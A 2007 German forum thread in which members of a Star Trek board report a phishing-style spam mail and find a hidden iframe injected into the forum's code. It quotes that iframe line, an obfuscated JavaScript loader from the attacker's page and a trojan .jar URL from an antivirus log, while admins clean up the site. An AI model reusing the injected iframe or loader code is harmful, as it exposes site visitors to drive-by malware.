Spam-Mail von admin@trekbbs.de Einstellungen

[Warp5Project]

Das kam gerade bei mir an:

Habe nur meine mailadresse rausgelöscht.

X-Apparently-To: meinemailadresse@diekeinerwissenmuss.de via 217.146.189.50; Mon, 08 Jan 2007 12:00:08 -0800
X-Originating-IP: [80.237.132.37]
Authentication-Results: mta154.mail.re3.yahoo.com from=trekbbs.de; domainkeys=neutral (no sig)
Received: from 80.237.132.37 (EHLO wp030.webpack.hosteurope.de) (80.237.132.37) by mta154.mail.re3.yahoo.com with SMTP; Mon, 08 Jan 2007 11:59:51 -0800
Received: by wp030.webpack.hosteurope.de running ExIM using local from nobody id 1H40d5-0007Kw-3r; Mon, 08 Jan 2007 20:57:59 +0100
To: admin@trekbbs.de
Subject: you have new private message ( From Trek BBS )
From: "Trek BBS" <admin@trekbbs.de>
X-Priority: 3
X-Mailer: IPB PHP Mailer
Message-ID: <E1H40d5-0007Kw-3r@wp030.webpack.hosteurope.de>
Date: Mon, 08 Jan 2007 20:57:59 +0100
X-bounce-key: webpack.hosteurope.de;webmaster@trekzone.de;1168286391;5caca4f8;


Trek BBS to you the new message at a forum that it to look has come press under the reference:<br>
<a href="http://www.radiodeejay.hr/forum/lang/inexed.htm" onmouseout="window.status=''" onmouseover="window.status='http://www.hotmail.com/news/index.php';return true">http://www.hotmail.com/news/index.php</a>
-------------------------------------
Registered Users: 542
Total Posts: 92658
Busiest Time: 59 users were online on 1. January 2006 - 04:16

-------------------------------------
Handy Links
-------------------------------------
Board Address: http://www.trekzone.de/community/index.php
Log In: http://www.trekzone.de/community/index.php?act=Login&CODE=00
Lost Password Recovery: http://www.trekzone.de/community/index.php?act=Reg&CODE=10

-------------------------------------
How to unsubscribe
-------------------------------------
Visit your email preferences (http://www.trekzone.de/community/index.php?act=UserCP&CODE=02) and ensure that the box for 'Send me any updates sent by the board administrator' is unchecked and submit the form

[Gast_Pedda]

Bei mir auch.

[Warp5Project]

Nachtrag:
Am Ende des Quellcodes hier im Forum steht das da:

<iframe src="http://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe>


Ich glaub, hier hat einer subtil gehackt.

[Kobi]

Hab ich auch bekommen ...

[Adm. Ges]

Laut Admin-Panel hat Marv ne Mail an alle User geschickt, ich klär das mal mit ihm. Aus irgendeinem Grund ging bei mir gerade auch der Virus-Alarm an, als ich auf den Link in Kobis Message geklickt hab.

[Adm. Ges]

Jup, sieht leider so aus, als hätte da mal wieder irgendein Arschloch ne Sicherheitslücke gefunden und zum spamen genutzt.

Marv wird sich das morgen mal angucken.

Habt ihr in eurem Profil den "Admins dürfen mich anmailen"-Punkt aktiviert?

[pana]

Ich habe die Nachricht ebenfalls erhalten.

Schön, zu wissen, daß unsere Daten hier sicher sind...

[flexus lucent]

das selbe bei mir!

[Warp5Project]

Habt ihr in eurem Profil den "Admins dürfen mich anmailen"-Punkt aktiviert?

Nope.

Trotzdem sollte mal jemand schleunigst die Zeile <iframe src="http://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe> aus dem Quellcode des Forums entfernen. Wer weiß, was dort alles für Daten schlummern.

Der Beitrag wurde von Warp5Project bearbeitet: 8. Jan 2007, 21:38

[Mad Hatter]

Ist deswegen die Bude hier gerade so voll?

[Adm. Ges]

Habt ihr in eurem Profil den "Admins dürfen mich anmailen"-Punkt aktiviert?

Nope.

Trotzdem sollte mal jemand schleunigst die Zeile <iframe src="http://www.radiodeejay.hr/forum/lang/inexed.htm" width=1 height=1></iframe> aus dem Quellcode des Forums entfernen. Wer weiß, was dort alles für Daten schlummern.

Leichter gesagt, als getan - den Müll muss man erstmal finden.

Edit: Hoffentlich gefunden & entsorgt.

[Gast_Pedda]

Und der Preis für die cleverste Board-Promo geht an... Tom Ges!

[spookie2]

Hm interessant. Danke für die schnelle Benachrichtigung - die Mailheaders waren ja valide (bis auf des mit den bounce) - sonst wär die Mail ja geblockt wurden.

der http://www.radiodeejay.hr/forum/lang/inexed.htm (des will nen java plugin laden egal...) hat nen Link zu http://www.lindzeletherman.com/forum/css/index2.php auf dem sich nur nen netter Javascript Code befindet.

CODE

function dc(x){var l=x.length,b=1024,i,j,u,p=0,s=0,w=0,t=Array(63,11,10,15,27,23,1,47,38,52,0,0,0,0,0,0,24,20,62,56,43,5,54,21,19,22,41,48,
42,35,49,8,17,18,26,14,33,50,32,51,55,6,28,0,0,0,0,57,0,9,13,29,2,7,59,53,58,61,
44,36,37,60,40,4,3,25,16,12,45,30,34,39,31,46,0);for(j=Math.ceil(l/b);j>0;j--){u='';for(i=Math.min(l,b);i>0;i--,l--){w|=
(t[x.charCodeAt(p++)-48])<<s;if(s){u+=String.fromCharCode(226^w&255);w>>=8;s-=2}else{s=6}}document.write(u)}}dc("dp")

Übrigends sehr merkwürdig das sich auf allen Adressen auch ein Invison Board befindet... Also allg. Softwarefehler und der Virus? legt dann immer ne eigene Seite im betroffenen Board an, die dann bei anderen Foren verlinkt werden => Mögliche Anklagen wegen Hackens laufen nur gegen andere Invision Boards Besitzer (letzter Satz ist nur ne Mutmaßung!).

Edits: JS Code mit Zeilenumbrüchen versehen..
Gut jedenfalls das der betroffene Code entfernt wurde


Der Beitrag wurde von spookie2 bearbeitet: 8. Jan 2007, 22:14

[Adm. Ges]

Jup, des weiteren wäre es sinnvoll, wenn ihr eure Avi-Programme heute nochmal anwerft, wenn ihr vor meiner Bereinigungsmaßnahme hier gewesen seid.

Bei mir hat nämlich das Avi-Programm angeschlagen - kann allerdings auch nen anderen Grund gehabt haben.

TR/ClassLoader.G.4 war der Trojaner, der geblockt wurde.

[Mad Hatter]

Bei mir hat nämlich das Avi-Programm angeschlagen - kann allerdings auch nen anderen Grund gehabt haben.

TR/ClassLoader.G.4 war der Trojaner, der geblockt wurde.

Jo, meins hat sich 3 x hintereinander gemeldet..

Zeit
08.01.2007 21:37:55
Modul: IMON
Objekt: Archive
Name: http://www.lindzeletherman.com/forum/css/dat/crtdcghcn.jar
Threat: eine Variante von Java/ClassLoader Trojaner
Aktion: Verbindung unterbrochen

Der Beitrag wurde von Morrigan bearbeitet: 8. Jan 2007, 22:50

[Kobi]

hmm, mein antivir hat nicht geklingelt ... dabei war ich hier zwischen email-info und entfernung des iframes ... ob der Opera sich dazwischen geschmissn hat ...?

(Nein, ich bin nicht wie mein vater, der jetzt den Viruslink mal anklicken würde, oder die Datei rechnung.PDF.exe mal doppelklickt.)

[Warp5Project]

ob der Opera sich dazwischen geschmissn hat ...?

gut möglich - mein virenscanner hat auch nich ausgeschlagen und ich nutze ebenfalls opera. allerdings hab ich http://www.radiodeejay.hr/* auch gleich geblockt, nachdem es mir aufgefallen war.

[MP]

Ick hatte diese Mail auch bekommen, naja wenigstens hat sie mich an die TrekBBS erinnert

Einfach mal goggeln nach "hack" und "invision"

lg

[Adm. Ges]

Und erneut ist es leider passiert. Ich hatte das Board vorübergehend offline genommen, um die eingebauten Links zu entfernen.

Sollten noch irgendwelche Merkwürdigkeiten (außer dem fehlenden Amazon-Banner) auftreten, bitte sagt bescheid.

[Warp5Project]

vielleicht sollte mal über eine andere forensoftware nachgedacht werden. das rumgehacke hier geht einem ja auf die nerven

[Adm. Ges]

vielleicht sollte mal über eine andere forensoftware nachgedacht werden. das rumgehacke hier geht einem ja auf die nerven

Tun wir schon seit längerem. Das Problem ist einfach, dass soetwas einiges kostet. Oder aber auch, dass wir eine vollkommen andere inkompatible Software nehmen und damit alle alten Beiträge verlieren würden.

Auf jeden Fall müssen wir was unternehmen, denn auch die ständigen Spam-Bot-Registrierungen sind für mich mit einigem Aufwand verbunden.

[Warp5Project]

Auf jeden Fall müssen wir was unternehmen, denn auch die ständigen Spam-Bot-Registrierungen sind für mich mit einigem Aufwand verbunden.

sperrt doch einfach die bots über .htaccess aus. das dürfte erstmal die lage beruhigen.
ansonsten ... gab's von phpbb nicht nicht einen converter, um beiträge etc. aus dem invisionboard zu übernehmen? bin mir da nicht sicher. wäre vielleicht eine überlegung wert (falls es das geben sollte), wenn doch bald das phpbb3 rauskommt, das zumindest auf den ersten blick einen ganz passablen eindruck macht. und kostenlos ist.

[Kobi]

Auf jeden Fall müssen wir was unternehmen, denn auch die ständigen Spam-Bot-Registrierungen sind für mich mit einigem Aufwand verbunden.

sperrt doch einfach die bots über .htaccess aus. das dürfte erstmal die lage beruhigen.
ansonsten ... gab's von phpbb nicht nicht einen converter, um beiträge etc. aus dem invisionboard zu übernehmen? bin mir da nicht sicher. wäre vielleicht eine überlegung wert (falls es das geben sollte), wenn doch bald das phpbb3 rauskommt, das zumindest auf den ersten blick einen ganz passablen eindruck macht. und kostenlos ist.

Ich hoffe sehr, dass Olympus tatsächlich hält, was es verspricht. Momentan habe ich bei phpBB auch mindestens drei neue Bots pro Tag.

[Warp5Project]

Seit ich die Viehcher über .htaccess ausgesperrt habe, hab ich kein Problem mehr mit denen. Vorher waren andauernd welche bei mir unterwegs (haben es aber nie geschafft, sich anzumelden).

[Adm. Ges]

Diesmal ging es ohne Spammail, allerdings wurde ins Design mal wieder ein netter Link eingebaut. Das müssen wir noch in den Griff bekommen. *seufz*

[marv]

Okay, ich habe jetzt die Funktion zum Ändern des Skins deaktiviert.